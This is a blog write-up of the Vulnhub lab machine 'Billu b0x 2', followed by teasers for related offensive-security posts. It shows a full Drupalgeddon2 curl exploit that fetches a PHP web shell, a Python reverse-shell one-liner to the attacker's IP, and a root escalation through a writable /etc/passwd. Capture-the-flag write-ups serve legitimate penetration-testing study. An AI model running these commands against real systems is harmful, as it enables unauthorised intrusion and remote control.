Skip to main content

Billu b0x 2 Walkthrough - Vulnhub Machine

Hello Friends,

This is my first boot2root writeup on a vuln machine made by my brother Manish Kishan Tanwar .
This machine is based on latest vulnerability of Drupal CMS.

Let's get started ...

Since port 80 was open , therefore I tried testing the webapp. After looking at the source code , it was clear that the website was running on a cms called drupal.I verified the version of drupal from changelog.txt.

The cms version of drupal used was 8.x. Suddenly something clicked my mind and I thought of giving a try for the famous drupalgeddon2 exploit.I tried exploiting through curl.

I used following command to download a php web shell -
curl -s -X 'POST'   --data 'mail[%23post_render][]=exec&mail[%23children]='"wget http://192.168.1.78/ninja.php"'&form_id=user_register_form'   'http://192.168.1.108/user/register?element_parents=account/mail/%23value&ajax_form=1' | cut -d ":" -f5


Through php shell , I got reverse shell on netcat by using python reverse shell command.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.78",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'



The reverse shell which I got  was not interactive and therefore I needed to spawn tty using-  python -c 'import pty;pty.spawn("bin/sh")' command 


I tried multiple things including running some kernel exploits etc. I found that /etc/passwd was having all the permissions and I was able to edit this file.I saw that there was a account present in /etc/passwd file with some encrypted hashes.I saw similar thing during my oscp lab and therefore tried adding my root password hash into passwd root user entry.


If a password hash is present in the second column in /etc/passwd, it takes precedence over the one in /etc/shadow and thus I was able to login as root .




Thanks for reading .Happy Hacking ;) 

Comments

Popular posts from this blog

Review of Pentester Academy - Attacking and Defending Active Directory Lab

Few months ago I didn't know what Active Directory is, and why should I care about it and never heard about ACL abuse and all. Although I had attended a BPAD (Breaking and Pwning Active Directory) training which was provided by Nullcon but I was not confident enough to go for this course exam, since my day-today activity involves VAPT stuffs related to Web/Network/Mobile and sometimes basic malware analysis (very basic one :p).  I started doing offshore lab and took help from some friends in understanding few Active Directory concepts. I did many silly mistakes during the lab and learned a lot. Meanwhile I registered for Active Directory Lab Course and got it in a discounted offer for first 50 students of about 11k INR  ( 1 mont lab access) :). Before wasting time any further let's dive into the review. The course -  https://www.pentesteracademy.com/activedirectorylab Certification - Certified Red Team Professional The Course Content  - After paying the course fee,

Shellcode Analysis x86 - SLAE Assignment 0x5

Before we start , I would like to bring your attention to this SLAE course from securitytube which will help you learn Shellcoding -  http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ We all use metasploit in our daily pentest engagements so let's break-up some of the shellcode comes with metasploit. Analysis :  1. linux/x86/chmod  2. linux/x86/exec  3. linux/x86/read_file 1. linux/x86/chmod -   msfvenom -p linux/x86/chmod -f raw | ndisasm -u - msfvenom -p linux/x86/chmod -f c msfvenom -p linux/x86/chmod -f raw | sctest -vvv -Ss 100000 -G chmod.dot dot chmod.dot -Tpng -o chmod.png  2. linux/x86/exec -   msfvenom -p linux/x86/exec CMD=ls FILE=tmp.bin -f raw | ndisasm -u - msfvenom -p linux/x86/exec CMD=ls -f c msfvenom -p linux/x86/exec CMD=ls FILE=tmp.bin -f raw | /opt/libemu/bin/sctest -vvv -Ss 100000 -G exec.dot dot exec.dot -Tpng -o exec.png 3. linux/x86/read_file - msfvenom -p linux/x86/shell/revers

Backdoring PE files using code caves : OSCE/CTP Module 0x03 (OSCE Preparation)

Hello Readers, This post will cover Backdooring of P.E file by using code caves . There are already good tools to do this for you eg. Backdoor Factory and Shelter which will do the same job and even bypass some static analysis of few antiviruses . I will be covering the manual approach of backdooring a PE file . Let's understand some terms : [x] PE file : The Portable Executable (PE) format is a file format for executables, object code, and DLLs, used in 32-bit and 64-bit versions of Windows operating systems. [x] Code Cave : Wikipedia says - "A code cave is a series of null bytes in a process's memory. The code cave inside a process's memory is often a reference to a section of the code’s script functions that have capacity for the injection of custom instructions. For example, if a script’s memory allows for 5 bytes and only 3 bytes are used, then the remaining 2 bytes can be used to add external code to the script." [x] Shellcode : Wikipedia - &qu